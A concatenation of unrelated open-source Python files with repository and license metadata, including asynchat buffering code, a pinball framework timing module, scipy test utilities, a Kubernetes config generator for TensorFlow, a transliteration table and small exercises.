self.ac_in_buffer = self.ac_in_buffer[n:]
self.terminator = 0
self.found_terminator()
else:
# 3 cases:
# 1) end of buffer matches terminator exactly:
# collect data, transition
# 2) end of buffer matches some prefix:
# collect data to the prefix
# 3) end of buffer does not match any prefix:
# collect data
terminator_len = len(terminator)
index = self.ac_in_buffer.find(terminator)
if index != -1:
# we found the terminator
if index > 0:
# don't bother reporting the empty string (source of subtle bugs)
self.collect_incoming_data (self.ac_in_buffer[:index])
self.ac_in_buffer = self.ac_in_buffer[index+terminator_len:]
# This does the Right Thing if the terminator is changed here.
self.found_terminator()
else:
# check for a prefix of the terminator
index = find_prefix_at_end (self.ac_in_buffer, terminator)
if index:
if index != lb:
# we found a prefix, collect up to the prefix
self.collect_incoming_data (self.ac_in_buffer[:-index])
self.ac_in_buffer = self.ac_in_buffer[-index:]
break
else:
# no prefix, collect it all
self.collect_incoming_data (self.ac_in_buffer)
self.ac_in_buffer = ''
def handle_write (self):
self.initiate_send()
def handle_close (self):
self.close()
def push (self, data):
sabs = self.ac_out_buffer_size
if len(data) > sabs:
for i in xrange(0, len(data), sabs):
self.producer_fifo.append(data[i:i+sabs])
else:
self.producer_fifo.append(data)
self.initiate_send()
def push_with_producer (self, producer):
self.producer_fifo.append(producer)
self.initiate_send()
def readable (self):
"predicate for inclusion in the readable for select()"
# cannot use the old predicate, it violates the claim of the
# set_terminator method.
# return (len(self.ac_in_buffer) <= self.ac_in_buffer_size)
return 1
def writable (self):
"predicate for inclusion in the writable for select()"
return self.producer_fifo or (not self.connected)
def close_when_done (self):
"automatically close this channel once the outgoing queue is empty"
self.producer_fifo.append(None)
def initiate_send(self):
while self.producer_fifo and self.connected:
first = self.producer_fifo[0]
# handle empty string/buffer or None entry
if not first:
del self.producer_fifo[0]
if first is None:
self.handle_close()
return
# handle classic producer behavior
obs = self.ac_out_buffer_size
try:
with catch_warnings():
if py3kwarning:
filterwarnings("ignore", ".*buffer", DeprecationWarning)
data = buffer(first, 0, obs)
except TypeError:
data = first.more()
if data:
self.producer_fifo.appendleft(data)
else:
del self.producer_fifo[0]
continue
# send the data
try:
num_sent = self.send(data)
except socket.error:
self.handle_error()
return
if num_sent:
if num_sent < len(data) or obs < len(first):
self.producer_fifo[0] = first[num_sent:]
else:
del self.producer_fifo[0]
# we tried to send some actual data
return
def discard_buffers (self):
# Emergencies only!
self.ac_in_buffer = ''
del self.incoming[:]
self.producer_fifo.clear()
class simple_producer:
def __init__ (self, data, buffer_size=512):
self.data = data
self.buffer_size = buffer_size
def more (self):
if len (self.data) > self.buffer_size:
result = self.data[:self.buffer_size]
self.data = self.data[self.buffer_size:]
return result
else:
result = self.data
self.data = ''
return result
class fifo:
def __init__ (self, list=None):
if not list:
self.list = deque()
else:
self.list = deque(list)
def __len__ (self):
return len(self.list)
def is_empty (self):
return not self.list
def first (self):
return self.list[0]
def push (self, data):
self.list.append(data)
def pop (self):
if self.list:
return (1, self.list.popleft())
else:
return (0, None)
# Given 'haystack', see if any prefix of 'needle' is at its end. This
# assumes an exact match has already been checked. Return the number of
# characters matched.
# for example:
# f_p_a_e ("qwerty\r", "\r\n") => 1
# f_p_a_e ("qwertydkjf", "\r\n") => 0
# f_p_a_e ("qwerty\r\n", "\r\n") => <undefined>
# this could maybe be made faster with a computed regex?
# [answer: no; circa Python-2.0, Jan 2001]
# new python: 28961/s
# old python: 18307/s
# re: 12820/s
# regex: 14035/s
def find_prefix_at_end (haystack, needle):
l = len(needle) - 1
while l and not haystack.endswith(needle[:l]):
l -= 1
return l
| gpl-2.0 |
qcapen/mpf | mpf/system/timing.py | 1 | 8236 | """Contains Timing and Timer classes"""
# timing.py
# Mission Pinball Framework
# Written by Brian Madden & Gabe Knuth
# Released under the MIT License. (See license info at the end of this file.)
# Documentation and more info at http://missionpinball.com/mpf
import logging
import time
class Timing(object):
"""System timing object.
This object manages timing for the whole system. Only one of these
objects should exist. By convention it is called 'timing'.
The timing keeps the current time in 'time' and a set of Timer
objects.
"""
HZ = None
"""Number of ticks per second."""
secs_per_tick = None
"""Float of how many seconds one tick takes."""
ms_per_tick = None
"""Float of how many milliseconds one tick takes."""
tick = 0
"""Current tick number of the machine. Starts at 0 when MPF boots and counts
up forever until MPF ends. Used instead of real-world time for all MPF time-
related functions.
"""
def __init__(self, machine):
self.timers = set()
self.timers_to_remove = set()
self.timers_to_add = set()
self.log = logging.getLogger("Timing")
self.machine = machine
try:
Timing.HZ = self.machine.config['timing']['hz']
except KeyError:
Timing.HZ = 30
self.log.debug("Configuring system Timing for %sHz", Timing.HZ)
Timing.secs_per_tick = 1 / float(Timing.HZ)
Timing.ms_per_tick = 1000 * Timing.secs_per_tick
def add(self, timer):
timer.wakeup = time.time() + timer.frequency
self.timers_to_add.add(timer)
def remove(self, timer):
self.timers_to_remove.add(timer)
def timer_tick(self):
global tick
Timing.tick += 1
for timer in self.timers:
if timer.wakeup and timer.wakeup <= time.time():
timer.call()
if timer.frequency:
timer.wakeup += timer.frequency
else:
timer.wakeup = None
while self.timers_to_remove:
timer = self.timers_to_remove.pop()
if timer in self.timers:
self.timers.remove(timer)
for timer in self.timers_to_add:
self.timers.add(timer)
self.timers_to_add = set()
@staticmethod
def secs(s):
return s / 1000.0
@staticmethod
def string_to_secs(time_string):
"""Decodes a string of real-world time into an float of seconds.
See 'string_to_ms' for a description of the time string.
"""
return Timing.string_to_ms(time_string) / 1000.0
@staticmethod
def string_to_ms(time_string):
"""Decodes a string of real-world time into an int of milliseconds.
Example inputs:
200ms
2s
None
If no "s" or "ms" is provided, this method assumes "milliseconds."
If time is 'None' or a string of 'None', this method returns 0.
Returns:
Integer. The examples listed above return 200, 2000 and 0,
respectively
"""
time_string = str(time_string).upper()
if time_string.endswith('MS') or time_string.endswith('MSEC'):
time_string = ''.join(i for i in time_string if not i.isalpha())
return int(time_string)
elif 'D' in time_string:
time_string = ''.join(i for i in time_string if not i.isalpha())
return int(float(time_string) * 86400 * 1000)
elif 'H' in time_string:
time_string = ''.join(i for i in time_string if not i.isalpha())
return int(float(time_string) * 3600 * 1000)
elif 'M' in time_string:
time_string = ''.join(i for i in time_string if not i.isalpha())
return int(float(time_string) * 60 * 1000)
elif time_string.endswith('S') or time_string.endswith('SEC'):
time_string = ''.join(i for i in time_string if not i.isalpha())
return int(float(time_string) * 1000)
elif not time_string or time_string == 'NONE':
return 0
else:
time_string = ''.join(i for i in time_string if not i.isalpha())
return int(time_string)
@staticmethod
def string_to_ticks(time_string):
"""Converts a string of real-world time into a float of how many machine
ticks correspond to that amount of time.
See 'string_to_ms' for a description of the time string.
"""
return Timing.string_to_ms(time_string) / Timing.ms_per_tick
@staticmethod
def int_to_pwm(ratio, length):
"""Converts a decimal between 0 and 1 to a pwm mask of whatever length
you want.
For example, an input ratio of .5 with a result length of 8 returns
10101010. And input ratio of .7 with a result length of 32 returns
11011011101101101101110110110110.
Another way to think about this is this method converts a decimal
percentage into the corresponding pwm mask.
Args:
ratio (float): A value between 0 and 1 that you want to convert.
length (int): How many digits you want in your result.
"""
whole_num = 0 # tracks our whole number
output = 0 # our output mask
count = 0 # our current count
for _i in range(length):
count += ratio
if int(count) > whole_num:
output |= 1
whole_num += 1
output <<= 1
return output
@staticmethod
def pwm_ms_to_byte_int(self, pwm_on, pwm_off):
"""Converts a pwm_on / pwm_off ms times to a single byte pwm mask.
"""
total_ms = pwm_on + pwm_off
if total_ms % 2 or total_ms > 8:
# todo dunno what to do here.
self.log.error("pwm_ms_to_byte error: pwm_on + pwm_off total must "
"be 1, 2, 4, or 8.")
quit()
if not pwm_on:
return 0
elif not pwm_off:
return 255
else:
return int(pwm_on / float(pwm_on + pwm_off) * 255)
class Timer(object):
"""Periodic timer object.
A timer defines a callable plus a frequency (in sec) at which it should be
called. The frequency can be set to None so that the timer is not enabled,
but it still exists.
Args:
callback (method): The method you want called each time this timer is
fired.
args (tuple): Arguments you want to pass to the callback.
frequency (int or float): How often, in seconds, you want this timer
to be called.
"""
def __init__(self, callback, args=tuple(), frequency=None):
self.callback = callback
self.args = args
self.wakeup = None
self.frequency = frequency
self.log = logging.getLogger("Timer")
self.log.debug('Creating timer for callback "%s" every %ss',
self.callback.__name__, self.frequency)
def call(self):
self.callback(*self.args)
# The MIT License (MIT)
# Copyright (c) 2013-2015 Brian Madden and Gabe Knuth
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
| mit |
jsilter/scipy | scipy/fftpack/tests/gen_fftw_ref.py | 73 | 1533 | from __future__ import division, print_function, absolute_import
from subprocess import Popen, PIPE, STDOUT
import numpy as np
SZ = [2, 3, 4, 8, 12, 15, 16, 17, 32, 64, 128, 256, 512, 1024]
def gen_data(dt):
arrays = {}
if dt == np.double:
pg = './fftw_double'
elif dt == np.float32:
pg = './fftw_single'
else:
raise ValueError("unknown: %s" % dt)
# Generate test data using FFTW for reference
for type in [1, 2, 3, 4, 5, 6, 7, 8]:
arrays[type] = {}
for sz in SZ:
a = Popen([pg, str(type), str(sz)], stdout=PIPE, stderr=STDOUT)
st = [i.strip() for i in a.stdout.readlines()]
arrays[type][sz] = np.fromstring(",".join(st), sep=',', dtype=dt)
return arrays
# generate single precision data
data = gen_data(np.float32)
filename = 'fftw_single_ref'
# Save ref data into npz format
d = {}
d['sizes'] = SZ
for type in [1, 2, 3, 4]:
for sz in SZ:
d['dct_%d_%d' % (type, sz)] = data[type][sz]
d['sizes'] = SZ
for type in [5, 6, 7, 8]:
for sz in SZ:
d['dst_%d_%d' % (type-4, sz)] = data[type][sz]
np.savez(filename, **d)
# generate double precision data
data = gen_data(np.float64)
filename = 'fftw_double_ref'
# Save ref data into npz format
d = {}
d['sizes'] = SZ
for type in [1, 2, 3, 4]:
for sz in SZ:
d['dct_%d_%d' % (type, sz)] = data[type][sz]
d['sizes'] = SZ
for type in [5, 6, 7, 8]:
for sz in SZ:
d['dst_%d_%d' % (type-4, sz)] = data[type][sz]
np.savez(filename, **d)
| bsd-3-clause |
kdpenner/google-python-exercises | basic/list2.py | 1 | 2269 | #!/usr/bin/python -tt
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
# Additional basic list exercises
# D. Given a list of numbers, return a list where
# all adjacent == elements have been reduced to a single element,
# so [1, 2, 2, 3] returns [1, 2, 3]. You may create a new list or
# modify the passed in list.
def remove_adjacent(nums):
list_del = []
for num in nums:
if len(list_del) == 0 or num != list_del[-1]:
list_del.append(num)
return list_del
# E. Given two lists sorted in increasing order, create and return a merged
# list of all the elements in sorted order. You may modify the passed in lists.
# Ideally, the solution should work in "linear" time, making a single
# pass of both lists.
def linear_merge(list1, list2):
list3 = list1 + list2
return sorted(list3)
# Note: the solution above is kind of cute, but unforunately list.pop(0)
# is not constant time with the standard python list implementation, so
# the above is not strictly linear time.
# An alternate approach uses pop(-1) to remove the endmost elements
# from each list, building a solution list which is backwards.
# Then use reversed() to put the result back in the correct order. That
# solution works in linear time, but is more ugly.
# Simple provided test() function used in main() to print
# what each function returns vs. what it's supposed to return.
def test(got, expected):
if got == expected:
prefix = ' OK '
else:
prefix = ' X '
print '%s got: %s expected: %s' % (prefix, repr(got), repr(expected))
# Calls the above functions with interesting inputs.
def main():
print 'remove_adjacent'
test(remove_adjacent([1, 2, 2, 3]), [1, 2, 3])
test(remove_adjacent([2, 2, 3, 3, 3]), [2, 3])
test(remove_adjacent([]), [])
print
print 'linear_merge'
test(linear_merge(['aa', 'xx', 'zz'], ['bb', 'cc']),
['aa', 'bb', 'cc', 'xx', 'zz'])
test(linear_merge(['aa', 'xx'], ['bb', 'cc', 'zz']),
['aa', 'bb', 'cc', 'xx', 'zz'])
test(linear_merge(['aa', 'aa'], ['aa', 'bb', 'bb']),
['aa', 'aa', 'aa', 'bb', 'bb'])
if __name__ == '__main__':
main()
| apache-2.0 |
lgscofield/odoo | addons/account_bank_statement_extensions/report/__init__.py | 415 | 1128 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
#
# Copyright (c) 2011 Noviat nv/sa (www.noviat.be). All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import bank_statement_balance_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
s40523247/2016fallcp_hw | plugin/liquid_tags/soundcloud.py | 26 | 1582 | """
Soundcloud Tag
--------------
This implements a Liquid-style soundcloud tag for Pelican.
It asks the official Soundcloud-API for the widget html code.
Syntax
------
`{% soundcloud track_url %}`
Example
-------
`{% soundcloud https://soundcloud.com/luftmentsh/hakotel %}`
Output
------
`<iframe width="100%" height="400" scrolling="no" frameborder="no" src="https://w.soundcloud.com/player/?visual=true&url=http%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F33875102&show_artwork=true"></iframe>`
"""
from .mdx_liquid_tags import LiquidTags
import re
import json
try:
from urllib.request import urlopen
except ImportError:
from urllib import urlopen
SYNTAX = '{% soundcloud track_url %}'
PARSE_SYNTAX = re.compile(r'(?P<track_url>https?://soundcloud.com/[\S]+)')
def get_widget(track_url):
r = urlopen(
'http://soundcloud.com/oembed',
data='format=json&url={}'.format(track_url).encode('utf-8'))
return json.loads(r.read().decode('utf-8'))['html']
def match_it(markup):
match = PARSE_SYNTAX.search(markup)
if match:
return match.groupdict()
else:
raise ValueError('Error processing input. '
'Expected syntax: {}'.format(SYNTAX))
@LiquidTags.register('soundcloud')
def soundcloud(preprocessor, tag, markup):
track_url = match_it(markup)['track_url']
return get_widget(track_url)
# ---------------------------------------------------
# This import allows image tag to be a Pelican plugin
from liquid_tags import register
| agpl-3.0 |
ibab/tensorflow | tensorflow/tools/dist_test/scripts/k8s_tensorflow.py | 9 | 7257 | #!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Generates YAML configuration files for distributed Tensorflow workers.
The workers will be run in a Kubernetes (k8s) container cluster.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
# Note: It is intentional that we do not import tensorflow in this script. The
# machine that launches a TensorFlow k8s cluster does not have to have the
# Python package of TensorFlow installed on it.
DEFAULT_DOCKER_IMAGE = 'tensorflow/tf_grpc_test_server'
DEFAULT_PORT = 2222
# TODO(cais): Consider adding resource requests/limits to the pods.
WORKER_RC = (
"""apiVersion: v1
kind: ReplicationController
metadata:
name: tf-worker{worker_id}
spec:
replicas: 1
template:
metadata:
labels:
tf-worker: "{worker_id}"
spec:
containers:
- name: tf-worker{worker_id}
image: {docker_image}
args:
- --cluster_spec={cluster_spec}
- --job_name=worker
- --task_id={worker_id}
ports:
- containerPort: {port}
""")
WORKER_SVC = (
"""apiVersion: v1
kind: Service
metadata:
name: tf-worker{worker_id}
labels:
tf-worker: "{worker_id}"
spec:
ports:
- port: {port}
targetPort: {port}
selector:
tf-worker: "{worker_id}"
""")
WORKER_LB_SVC = (
"""apiVersion: v1
kind: Service
metadata:
name: tf-worker{worker_id}
labels:
tf-worker: "{worker_id}"
spec:
type: LoadBalancer
ports:
- port: {port}
selector:
tf-worker: "{worker_id}"
""")
PARAM_SERVER_RC = (
"""apiVersion: v1
kind: ReplicationController
metadata:
name: tf-ps{param_server_id}
spec:
replicas: 1
template:
metadata:
labels:
tf-ps: "{param_server_id}"
spec:
containers:
- name: tf-ps{param_server_id}
image: {docker_image}
args:
- --cluster_spec={cluster_spec}
- --job_name=ps
- --task_id={param_server_id}
ports:
- containerPort: {port}
""")
PARAM_SERVER_SVC = (
"""apiVersion: v1
kind: Service
metadata:
name: tf-ps{param_server_id}
labels:
tf-ps: "{param_server_id}"
spec:
ports:
- port: {port}
selector:
tf-ps: "{param_server_id}"
""")
def main():
"""Do arg parsing."""
parser = argparse.ArgumentParser()
parser.add_argument('--num_workers',
type=int,
default=2,
help='How many worker pods to run')
parser.add_argument('--num_parameter_servers',
type=int,
default=1,
help='How many paramater server pods to run')
parser.add_argument('--grpc_port',
type=int,
default=DEFAULT_PORT,
help='GRPC server port (Default: %d)' % DEFAULT_PORT)
parser.add_argument('--request_load_balancer',
type=bool,
default=False,
help='To request worker0 to be exposed on a public IP '
'address via an external load balancer, enabling you to '
'run client processes from outside the cluster')
parser.add_argument('--docker_image',
type=str,
default=DEFAULT_DOCKER_IMAGE,
help='Override default docker image for the TensorFlow '
'GRPC server')
args = parser.parse_args()
if args.num_workers <= 0:
sys.stderr.write('--num_workers must be greater than 0; received %d\n'
% args.num_workers)
sys.exit(1)
if args.num_parameter_servers <= 0:
sys.stderr.write(
'--num_parameter_servers must be greater than 0; received %d\n'
% args.num_parameter_servers)
sys.exit(1)
# Generate contents of yaml config
yaml_config = GenerateConfig(args.num_workers,
args.num_parameter_servers,
args.grpc_port,
args.request_load_balancer,
args.docker_image)
print(yaml_config) # pylint: disable=superfluous-parens
def GenerateConfig(num_workers,
num_param_servers,
port,
request_load_balancer,
docker_image):
"""Generate configuration strings."""
config = ''
for worker in range(num_workers):
config += WORKER_RC.format(
port=port,
worker_id=worker,
docker_image=docker_image,
cluster_spec=WorkerClusterSpecString(num_workers,
num_param_servers,
port))
config += '---\n'
if request_load_balancer:
config += WORKER_LB_SVC.format(port=port,
worker_id=worker)
else:
config += WORKER_SVC.format(port=port,
worker_id=worker)
config += '---\n'
for param_server in range(num_param_servers):
config += PARAM_SERVER_RC.format(
port=port,
param_server_id=param_server,
docker_image=docker_image,
cluster_spec=ParamServerClusterSpecString(num_workers,
num_param_servers,
port))
config += '---\n'
config += PARAM_SERVER_SVC.format(port=port,
param_server_id=param_server)
config += '---\n'
return config
def WorkerClusterSpecString(num_workers,
num_param_servers,
port):
"""Generates worker cluster spec."""
return ClusterSpecString(num_workers, num_param_servers, port)
def ParamServerClusterSpecString(num_workers,
num_param_servers,
port):
"""Generates parameter server spec."""
return ClusterSpecString(num_workers, num_param_servers, port)
def ClusterSpecString(num_workers,
num_param_servers,
port):
"""Generates general cluster spec."""
spec = 'worker|'
for worker in range(num_workers):
spec += 'tf-worker%d:%d' % (worker, port)
if worker != num_workers-1:
spec += ';'
spec += ',ps|'
for param_server in range(num_param_servers):
spec += 'tf-ps%d:%d' % (param_server, port)
if param_server != num_param_servers-1:
spec += ';'
return spec
if __name__ == '__main__':
main()
| apache-2.0 |
sahilqur/python_projects | Text/caesar_cipher.py | 15 | 1107 | """
Caesar Cipher - Enter the cipher number and the program will "encrypt" them with
the Caesar cipher (a.k.a. ROT #). Type the word "exit" when you're finished.
"""
while True:
try:
cipher = int(raw_input("Enter the cipher number: "))
break
except ValueError:
print "I need a valid integer, please."
print "Enter the text to be encoded."
print "Enter \"exit\" to leave."
if __name__ == '__main__':
while True:
text = raw_input("> ")
encoded = []
if text.lower() == "exit":
break
for letter in text:
if letter.isalpha():
is_upper = False
if letter == letter.upper():
is_upper = True
letter = letter.lower()
value = (ord(letter) - 97 + cipher) % 26
if is_upper:
value -= 32
encoded.append(chr(value + 97))
else:
encoded.append(letter)
print ''.join(encoded)
| mit |
zobe123/Plex-CS | lib/unidecode/x0d2.py | 253 | 4724 | data = (
'toels', # 0x00
'toelt', # 0x01
'toelp', # 0x02
'toelh', # 0x03
'toem', # 0x04
'toeb', # 0x05
'toebs', # 0x06
'toes', # 0x07
'toess', # 0x08
'toeng', # 0x09
'toej', # 0x0a
'toec', # 0x0b
'toek', # 0x0c
'toet', # 0x0d
'toep', # 0x0e
'toeh', # 0x0f
'tyo', # 0x10
'tyog', # 0x11
'tyogg', # 0x12
'tyogs', # 0x13
'tyon', # 0x14
'tyonj', # 0x15
'tyonh', # 0x16
'tyod', # 0x17
'tyol', # 0x18
'tyolg', # 0x19
'tyolm', # 0x1a
'tyolb', # 0x1b
'tyols', # 0x1c
'tyolt', # 0x1d
'tyolp', # 0x1e
'tyolh', # 0x1f
'tyom', # 0x20
'tyob', # 0x21
'tyobs', # 0x22
'tyos', # 0x23
'tyoss', # 0x24
'tyong', # 0x25
'tyoj', # 0x26
'tyoc', # 0x27
'tyok', # 0x28
'tyot', # 0x29
'tyop', # 0x2a
'tyoh', # 0x2b
'tu', # 0x2c
'tug', # 0x2d
'tugg', # 0x2e
'tugs', # 0x2f
'tun', # 0x30
'tunj', # 0x31
'tunh', # 0x32
'tud', # 0x33
'tul', # 0x34
'tulg', # 0x35
'tulm', # 0x36
'tulb', # 0x37
'tuls', # 0x38
'tult', # 0x39
'tulp', # 0x3a
'tulh', # 0x3b
'tum', # 0x3c
'tub', # 0x3d
'tubs', # 0x3e
'tus', # 0x3f
'tuss', # 0x40
'tung', # 0x41
'tuj', # 0x42
'tuc', # 0x43
'tuk', # 0x44
'tut', # 0x45
'tup', # 0x46
'tuh', # 0x47
'tweo', # 0x48
'tweog', # 0x49
'tweogg', # 0x4a
'tweogs', # 0x4b
'tweon', # 0x4c
'tweonj', # 0x4d
'tweonh', # 0x4e
'tweod', # 0x4f
'tweol', # 0x50
'tweolg', # 0x51
'tweolm', # 0x52
'tweolb', # 0x53
'tweols', # 0x54
'tweolt', # 0x55
'tweolp', # 0x56
'tweolh', # 0x57
'tweom', # 0x58
'tweob', # 0x59
'tweobs', # 0x5a
'tweos', # 0x5b
'tweoss', # 0x5c
'tweong', # 0x5d
'tweoj', # 0x5e
'tweoc', # 0x5f
'tweok', # 0x60
'tweot', # 0x61
'tweop', # 0x62
'tweoh', # 0x63
'twe', # 0x64
'tweg', # 0x65
'twegg', # 0x66
'twegs', # 0x67
'twen', # 0x68
'twenj', # 0x69
'twenh', # 0x6a
'twed', # 0x6b
'twel', # 0x6c
'twelg', # 0x6d
'twelm', # 0x6e
'twelb', # 0x6f
'twels', # 0x70
'twelt', # 0x71
'twelp', # 0x72
'twelh', # 0x73
'twem', # 0x74
'tweb', # 0x75
'twebs', # 0x76
'twes', # 0x77
'twess', # 0x78
'tweng', # 0x79
'twej', # 0x7a
'twec', # 0x7b
'twek', # 0x7c
'twet', # 0x7d
'twep', # 0x7e
'tweh', # 0x7f
'twi', # 0x80
'twig', # 0x81
'twigg', # 0x82
'twigs', # 0x83
'twin', # 0x84
'twinj', # 0x85
'twinh', # 0x86
'twid', # 0x87
'twil', # 0x88
'twilg', # 0x89
'twilm', # 0x8a
'twilb', # 0x8b
'twils', # 0x8c
'twilt', # 0x8d
'twilp', # 0x8e
'twilh', # 0x8f
'twim', # 0x90
'twib', # 0x91
'twibs', # 0x92
'twis', # 0x93
'twiss', # 0x94
'twing', # 0x95
'twij', # 0x96
'twic', # 0x97
'twik', # 0x98
'twit', # 0x99
'twip', # 0x9a
'twih', # 0x9b
'tyu', # 0x9c
'tyug', # 0x9d
'tyugg', # 0x9e
'tyugs', # 0x9f
'tyun', # 0xa0
'tyunj', # 0xa1
'tyunh', # 0xa2
'tyud', # 0xa3
'tyul', # 0xa4
'tyulg', # 0xa5
'tyulm', # 0xa6
'tyulb', # 0xa7
'tyuls', # 0xa8
'tyult', # 0xa9
'tyulp', # 0xaa
'tyulh', # 0xab
'tyum', # 0xac
'tyub', # 0xad
'tyubs', # 0xae
'tyus', # 0xaf
'tyuss', # 0xb0
'tyung', # 0xb1
'tyuj', # 0xb2
'tyuc', # 0xb3
'tyuk', # 0xb4
'tyut', # 0xb5
'tyup', # 0xb6
'tyuh', # 0xb7
'teu', # 0xb8
'teug', # 0xb9
'teugg', # 0xba
'teugs', # 0xbb
'teun', # 0xbc
'teunj', # 0xbd
'teunh', # 0xbe
'teud', # 0xbf
'teul', # 0xc0
'teulg', # 0xc1
'teulm', # 0xc2
'teulb', # 0xc3
'teuls', # 0xc4
'teult', # 0xc5
'teulp', # 0xc6
'teulh', # 0xc7
'teum', # 0xc8
'teub', # 0xc9
'teubs', # 0xca
'teus', # 0xcb
'teuss', # 0xcc
'teung', # 0xcd
'teuj', # 0xce
'teuc', # 0xcf
'teuk', # 0xd0
'teut', # 0xd1
'teup', # 0xd2
'teuh', # 0xd3
'tyi', # 0xd4
'tyig', # 0xd5
'tyigg', # 0xd6
'tyigs', # 0xd7
'tyin', # 0xd8
'tyinj', # 0xd9
'tyinh', # 0xda
'tyid', # 0xdb
'tyil', # 0xdc
'tyilg', # 0xdd
'tyilm', # 0xde
'tyilb', # 0xdf
'tyils', # 0xe0
'tyilt', # 0xe1
'tyilp', # 0xe2
'tyilh', # 0xe3
'tyim', # 0xe4
'tyib', # 0xe5
'tyibs', # 0xe6
'tyis', # 0xe7
'tyiss', # 0xe8
'tying', # 0xe9
'tyij', # 0xea
'tyic', # 0xeb
'tyik', # 0xec
'tyit', # 0xed
'tyip', # 0xee
'tyih', # 0xef
'ti', # 0xf0
'tig', # 0xf1
'tigg', # 0xf2
'tigs', # 0xf3
'tin', # 0xf4
'tinj', # 0xf5
'tinh', # 0xf6
'tid', # 0xf7
'til', # 0xf8
'tilg', # 0xf9
'tilm', # 0xfa
'tilb', # 0xfb
'tils', # 0xfc
'tilt', # 0xfd
'tilp', # 0xfe
'tilh', # 0xff
)
| gpl-3.0 |
vanpact/scipy | scipy/signal/tests/test_wavelets.py | 108 | 5273 | from __future__ import division, print_function, absolute_import
import numpy as np
from numpy.testing import TestCase, run_module_suite, assert_equal, \
assert_array_equal, assert_array_almost_equal, assert_array_less, assert_
from scipy._lib.six import xrange
from scipy.signal import wavelets
class TestWavelets(TestCase):
def test_qmf(self):
assert_array_equal(wavelets.qmf([1, 1]), [1, -1])
def test_daub(self):
for i in xrange(1, 15):
assert_equal(len(wavelets.daub(i)), i * 2)
def test_cascade(self):
for J in xrange(1, 7):
for i in xrange(1, 5):
lpcoef = wavelets.daub(i)
k = len(lpcoef)
x, phi, psi = wavelets.cascade(lpcoef, J)
assert_(len(x) == len(phi) == len(psi))
assert_equal(len(x), (k - 1) * 2 ** J)
def test_morlet(self):
x = wavelets.morlet(50, 4.1, complete=True)
y = wavelets.morlet(50, 4.1, complete=False)
# Test if complete and incomplete wavelet have same lengths:
assert_equal(len(x), len(y))
# Test if complete wavelet is less than incomplete wavelet:
assert_array_less(x, y)
x = wavelets.morlet(10, 50, complete=False)
y = wavelets.morlet(10, 50, complete=True)
# For large widths complete and incomplete wavelets should be
# identical within numerical precision:
assert_equal(x, y)
# miscellaneous tests:
x = np.array([1.73752399e-09 + 9.84327394e-25j,
6.49471756e-01 + 0.00000000e+00j,
1.73752399e-09 - 9.84327394e-25j])
y = wavelets.morlet(3, w=2, complete=True)
assert_array_almost_equal(x, y)
x = np.array([2.00947715e-09 + 9.84327394e-25j,
7.51125544e-01 + 0.00000000e+00j,
2.00947715e-09 - 9.84327394e-25j])
y = wavelets.morlet(3, w=2, complete=False)
assert_array_almost_equal(x, y, decimal=2)
x = wavelets.morlet(10000, s=4, complete=True)
y = wavelets.morlet(20000, s=8, complete=True)[5000:15000]
assert_array_almost_equal(x, y, decimal=2)
x = wavelets.morlet(10000, s=4, complete=False)
assert_array_almost_equal(y, x, decimal=2)
y = wavelets.morlet(20000, s=8, complete=False)[5000:15000]
assert_array_almost_equal(x, y, decimal=2)
x = wavelets.morlet(10000, w=3, s=5, complete=True)
y = wavelets.morlet(20000, w=3, s=10, complete=True)[5000:15000]
assert_array_almost_equal(x, y, decimal=2)
x = wavelets.morlet(10000, w=3, s=5, complete=False)
assert_array_almost_equal(y, x, decimal=2)
y = wavelets.morlet(20000, w=3, s=10, complete=False)[5000:15000]
assert_array_almost_equal(x, y, decimal=2)
x = wavelets.morlet(10000, w=7, s=10, complete=True)
y = wavelets.morlet(20000, w=7, s=20, complete=True)[5000:15000]
assert_array_almost_equal(x, y, decimal=2)
x = wavelets.morlet(10000, w=7, s=10, complete=False)
assert_array_almost_equal(x, y, decimal=2)
y = wavelets.morlet(20000, w=7, s=20, complete=False)[5000:15000]
assert_array_almost_equal(x, y, decimal=2)
def test_ricker(self):
w = wavelets.ricker(1.0, 1)
expected = 2 / (np.sqrt(3 * 1.0) * (np.pi ** 0.25))
assert_array_equal(w, expected)
lengths = [5, 11, 15, 51, 101]
for length in lengths:
